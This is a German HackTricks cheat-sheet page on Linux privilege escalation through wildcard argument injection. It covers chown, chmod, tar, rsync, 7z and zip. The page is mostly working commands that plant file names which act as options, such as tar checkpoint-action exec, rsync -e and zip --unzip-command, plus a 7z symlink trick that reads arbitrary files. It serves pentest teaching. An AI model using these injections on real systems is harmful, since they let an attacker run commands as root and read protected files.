hacktricks/linux-hardening/privilege-escalation/wildcards-spare-tricks.md
2024-02-10 15:36:32 +00:00

5.1 KiB

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

chown, chmod

Sie können angeben, welchen Dateibesitzer und welche Berechtigungen Sie für den Rest der Dateien kopieren möchten.

touch "--reference=/my/own/path/filename"

Sie können dies mit https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (kombinierter Angriff) ausnutzen. Weitere Informationen finden Sie unter https://www.exploit-db.com/papers/33930

Tar

Beliebige Befehle ausführen:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Sie können dies mit https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar attack) ausnutzen. Weitere Informationen finden Sie unter https://www.exploit-db.com/papers/33930

Rsync

Beliebige Befehle ausführen:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Sie können dies mit https://github.com/localh0t/wildpwn/blob/master/wildpwn.py ausnutzen (rsync-Angriff)
Weitere Informationen finden Sie unter https://www.exploit-db.com/papers/33930

7z

In 7z können Sie sogar mit -- vor * (beachten Sie, dass -- bedeutet, dass die folgende Eingabe nicht als Parameter behandelt werden kann, sondern nur als Dateipfade in diesem Fall) einen beliebigen Fehler verursachen, um eine Datei zu lesen. Wenn also ein Befehl wie der folgende von root ausgeführt wird:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

Und Sie können Dateien im Ordner erstellen, in dem dies ausgeführt wird. Sie könnten die Datei @root.txt und die Datei root.txt erstellen, wobei root.txt ein Symbolischer Link auf die Datei ist, die Sie lesen möchten:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Dann, wenn 7z ausgeführt wird, behandelt es root.txt als eine Datei, die die Liste der Dateien enthält, die es komprimieren soll (das zeigt die Existenz von @root.txt an) und wenn 7z root.txt liest, liest es /file/you/want/to/read und da der Inhalt dieser Datei keine Liste von Dateien ist, wird ein Fehler angezeigt und der Inhalt wird angezeigt.

Weitere Informationen finden Sie in den Write-ups der Box CTF von HackTheBox.

Zip

Beliebige Befehle ausführen:

zip name.zip files -T --unzip-command "sh -c whoami"
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: